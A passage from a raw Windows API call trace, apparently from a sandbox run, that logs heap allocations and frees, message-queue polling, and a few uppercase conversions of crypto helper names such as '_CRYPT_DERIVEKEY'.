lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0269.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0269.308] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0269.308] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d00 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0269.309] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.309] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0269.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0269.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0269.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0269.310] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c70 [0269.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.310] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.310] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0269.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0269.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0269.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0269.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0269.312] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0269.312] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0269.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0269.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0269.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51dc0 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0269.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0269.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cd0 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ce8 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0269.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0269.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0269.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0269.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0269.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0269.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0269.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.314] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0269.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0269.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0269.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0269.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0269.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.316] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0269.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c28 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.316] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.316] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d00 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0269.317] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0269.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 